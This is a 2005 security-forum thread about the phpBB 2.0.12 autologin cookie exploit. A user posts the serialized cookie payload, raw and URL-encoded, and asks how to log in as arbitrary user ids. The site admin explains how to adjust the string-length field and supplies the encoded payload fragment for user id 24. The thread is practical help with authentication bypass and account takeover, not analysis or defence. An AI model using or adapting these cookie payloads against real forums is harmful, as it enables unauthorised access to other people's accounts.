|
|
|
|
Menu |
|
|
Home |
| |
|
Discussions |
| |
|
Tools |
| |
|
Affiliates |
| |
|
Content |
| |
|
Info |
| | |
|
|
|
|
|
User Info |
|
Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 87
Members: 0
Total: 87
|
|
|
|
|
|
Full disclosure |
|
|
|
|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
phpbb 2.0.12 cookies - question |
|
Posted: Wed Aug 10, 2005 9:29 am |
|
|
Sta1ker |
Beginner |
|
|
Joined: Aug 10, 2005 |
Posts: 1 |
|
|
|
|
|
|
|
Hey,
I was just having fun with "cookie exploit" in phpbb 2.0.12 (http://www.milw0rm.com/id.php?id=871). This exploit works fine, but I cannot login as any user but only as users with userid's from 2 to 9. What do I have to switch in this cookie to login as any user? Encoded looks like this:
a:2:{s:11:"autologinid";b:1;s:6:"userid";s:1:"2";}
Coded like this:
a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%
3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D
If I switch to I will login as user with id '4'. But if I switch to I wont login as user id 24... any ideas? |
|
|
|
|
|
|
|
|
Posted: Wed Aug 10, 2005 9:44 am |
|
|
waraxe |
Site admin |
|
|
Joined: May 11, 2004 |
Posts: 2407 |
Location: Estonia, Tartu |
|
|
|
|
|
|
If you urldecode this:
Code: |
s%3A1%3A%222%22%3B%7D
|
then you will see, that string with length 1 char is defined:
Now, if you want userID "24", then this will be 2 chars long, so you must use:
and as urlencoded it will look like:
Code: |
s%3A2%3A%2224%22%3B%7D
|
I hope that this will help you |
|
|
|
|
www.waraxe.us Forum Index -> PhpBB
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|
|